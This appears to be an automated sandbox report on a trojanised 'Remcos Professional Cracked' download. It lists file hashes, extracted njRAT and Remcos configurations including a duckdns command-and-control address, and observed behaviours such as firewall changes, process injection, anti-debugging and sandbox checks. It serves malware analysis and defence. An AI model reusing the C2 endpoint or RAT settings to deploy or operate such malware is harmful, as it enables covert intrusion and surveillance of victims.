Overview
overview
10Static
static
3Remcos Pro...22.zip
windows7-x64
1Remcos Pro...22.zip
windows10-2004-x64
1Remcos Pro...22.zip
windows10-ltsc 2021-x64
1Remcos Pro...22.zip
windows11-21h2-x64
1LICENSE
windows7-x64
1LICENSE
windows10-2004-x64
1LICENSE
windows10-ltsc 2021-x64
1LICENSE
windows11-21h2-x64
1Remcos Pro...le.ini
windows7-x64
1Remcos Pro...le.ini
windows10-2004-x64
1Remcos Pro...le.ini
windows10-ltsc 2021-x64
1Remcos Pro...le.ini
windows11-21h2-x64
3Remcos Pro...22.exe
windows7-x64
7Remcos Pro...22.exe
windows10-2004-x64
10Remcos Pro...22.exe
windows10-ltsc 2021-x64
10Remcos Pro...22.exe
windows11-21h2-x64
10Remcos Pro...gs.ini
windows7-x64
1Remcos Pro...gs.ini
windows10-2004-x64
1Remcos Pro...gs.ini
windows10-ltsc 2021-x64
1Remcos Pro...gs.ini
windows11-21h2-x64
3Analysis
-
max time kernel
899s -
max time network
901s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250217-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
21/02/2025, 17:35 UTC
Static task
static1
Behavioral task
behavioral1
Sample
Remcos Professional Cracked By Alcatraz3222.zip
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Remcos Professional Cracked By Alcatraz3222.zip
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
Remcos Professional Cracked By Alcatraz3222.zip
Resource
win10ltsc2021-20250217-en
Behavioral task
behavioral4
Sample
Remcos Professional Cracked By Alcatraz3222.zip
Resource
win11-20250217-en
Behavioral task
behavioral5
Sample
LICENSE
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
LICENSE
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
LICENSE
Resource
win10ltsc2021-20250217-en
Behavioral task
behavioral8
Sample
LICENSE
Resource
win11-20250217-en
Behavioral task
behavioral9
Sample
Remcos Professional Cracked By Alcatraz3222/BuilderProfiles/DefaultProfile.ini
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
Remcos Professional Cracked By Alcatraz3222/BuilderProfiles/DefaultProfile.ini
Resource
win10v2004-20250217-en
Behavioral task
behavioral11
Sample
Remcos Professional Cracked By Alcatraz3222/BuilderProfiles/DefaultProfile.ini
Resource
win10ltsc2021-20250217-en
Behavioral task
behavioral12
Sample
Remcos Professional Cracked By Alcatraz3222/BuilderProfiles/DefaultProfile.ini
Resource
win11-20250217-en
Behavioral task
behavioral13
Sample
Remcos Professional Cracked By Alcatraz3222/Remcos Professional Cracked By Alcatraz3222.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
Remcos Professional Cracked By Alcatraz3222/Remcos Professional Cracked By Alcatraz3222.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral15
Sample
Remcos Professional Cracked By Alcatraz3222/Remcos Professional Cracked By Alcatraz3222.exe
Resource
win10ltsc2021-20250217-en
Behavioral task
behavioral16
Sample
Remcos Professional Cracked By Alcatraz3222/Remcos Professional Cracked By Alcatraz3222.exe
Resource
win11-20250217-en
Behavioral task
behavioral17
Sample
Remcos Professional Cracked By Alcatraz3222/Remcos_Settings.ini
Resource
win7-20240729-en
Behavioral task
behavioral18
Sample
Remcos Professional Cracked By Alcatraz3222/Remcos_Settings.ini
Resource
win10v2004-20250217-en
Behavioral task
behavioral19
Sample
Remcos Professional Cracked By Alcatraz3222/Remcos_Settings.ini
Resource
win10ltsc2021-20250217-en
Behavioral task
behavioral20
Sample
Remcos Professional Cracked By Alcatraz3222/Remcos_Settings.ini
Resource
win11-20250217-en
General
-
Target
Remcos Professional Cracked By Alcatraz3222/Remcos Professional Cracked By Alcatraz3222.exe
-
Size
17.7MB
-
MD5
efc159c7cf75545997f8c6af52d3e802
-
SHA1
b85bd368c91a13db1c5de2326deb25ad666c24c1
-
SHA256
898ac001d0f6c52c1001c640d9860287fdf30a648d580e9f5dd15e2ef84ab18e
-
SHA512
d06a432233dceb731defd53238971699fef201d0f9144ee50e5dd7d6620dfdd6c298d52618bf2c9feb0519574f4565fb0177b00fd8292768fbd8b85dd11e650d
-
SSDEEP
393216:GYuGvp8EHb+in8f4Zg41+Q4AXf5ZZcyfHDMxVpSc+q+eOFxdx:3mqSi8fN4sAXfrZcyfo7p0eYHx
Malware Config
Extracted
njrat
0.7d
HacKed
dllsys.duckdns.org:3202
3b570ffeeb3d34249b9a5ce0ee58a328
-
reg_key
3b570ffeeb3d34249b9a5ce0ee58a328
-
splitter
svchost
Extracted
remcos
2.2.0 Light
RemoteHost
127.0.0.1:8124
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
3
-
copy_file
remcos.exe
-
copy_folder
remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
Remcos-1OKHE7
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Hawkeye family
-
Njrat family
-
Remcos family
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3864 netsh.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000\Control Panel\International\Geo\Nation Remcos Professional Cracked By Alcatraz3222.exe Key value queried \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000\Control Panel\International\Geo\Nation remcos_agent.exe -
Executes dropped EXE 4 IoCs
pid Process 3252 Remcos Professional Cracked By Alcatraz3222.exe 3212 taskhost.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4680 remcos_agent.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File created C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_230f9025c8623e5d\usbport.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_71e43a6eaa912e56\input.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_e89200d3ede2154e\hdaudbus.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_f6ccd5b2c8226c4a\mshdc.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_72ab89a5cc3218be\machine.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF dxdiag.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3252 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4952 set thread context of 3212 4952 Remcos Professional Cracked By Alcatraz3222.exe 88 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Remcos Professional Cracked By Alcatraz3222.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dxdiag.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Remcos Professional Cracked By Alcatraz3222.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Remcos Professional Cracked By Alcatraz3222.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language remcos_agent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhost.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dxdiag.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dxdiag.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs dxdiag.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dxdiag.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dxdiag.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs dxdiag.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 4e00310000000000555a918c100054656d7000003a0009000400efbe515a0e8f555a918c2e000000160601000000020000000000000000000000000000004fdcf300540065006d007000000014000000 Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 Remcos Professional Cracked By Alcatraz3222.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1" dxdiag.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1095212214-1383118828-1037266802-1000\{9848AE43-F382-40AD-83F2-3C7C39D1F773} dxdiag.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 Remcos Professional Cracked By Alcatraz3222.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Remcos Professional Cracked By Alcatraz3222.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer dxdiag.exe Set value (str) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Remcos Professional Cracked By Alcatraz3222.exe Set value (str) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Remcos Professional Cracked By Alcatraz3222.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff Remcos Professional Cracked By Alcatraz3222.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32 dxdiag.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Remcos Professional Cracked By Alcatraz3222.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID dxdiag.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Remcos Professional Cracked By Alcatraz3222.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 5000310000000000515ab39110004c6f63616c003c0009000400efbe515a0e8f555a8c8c2e000000150601000000020000000000000000000000000000005873f7004c006f00630061006c00000014000000 Remcos Professional Cracked By Alcatraz3222.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID dxdiag.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" Remcos Professional Cracked By Alcatraz3222.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Remcos Professional Cracked By Alcatraz3222.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 820074001c00434653461600310000000000515a0e8f120041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe515a0e8f555a8c8c2e00000002060100000002000000000000000000000000000000df4763004100700070004400610074006100000042000000 Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\NodeSlot = "2" Remcos Professional Cracked By Alcatraz3222.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject dxdiag.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Remcos Professional Cracked By Alcatraz3222.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 0100000000000000ffffffff Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings remcos_agent.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1" dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject" dxdiag.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell Remcos Professional Cracked By Alcatraz3222.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class" dxdiag.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 6800310000000000555a938c10004255494c44457e310000500009000400efbe555a938c555a938c2e000000ac7d020000000a0000000000000000000000000000004bb6cd004200750069006c00640065007200500072006f00660069006c0065007300000018000000 Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" Remcos Professional Cracked By Alcatraz3222.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID dxdiag.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Remcos Professional Cracked By Alcatraz3222.exe Set value (data) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 Remcos Professional Cracked By Alcatraz3222.exe Set value (int) \REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Remcos Professional Cracked By Alcatraz3222.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4952 Remcos Professional Cracked By Alcatraz3222.exe 3252 Remcos Professional Cracked By Alcatraz3222.exe 3252 Remcos Professional Cracked By Alcatraz3222.exe 3252 Remcos Professional Cracked By Alcatraz3222.exe 3252 Remcos Professional Cracked By Alcatraz3222.exe 4952 Remcos Professional Cracked By Alcatraz3222.exe 4952 Remcos Professional Cracked By Alcatraz3222.exe 4952 Remcos Professional Cracked By Alcatraz3222.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe 3212 taskhost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3212 taskhost.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4952 Remcos Professional Cracked By Alcatraz3222.exe Token: SeDebugPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe 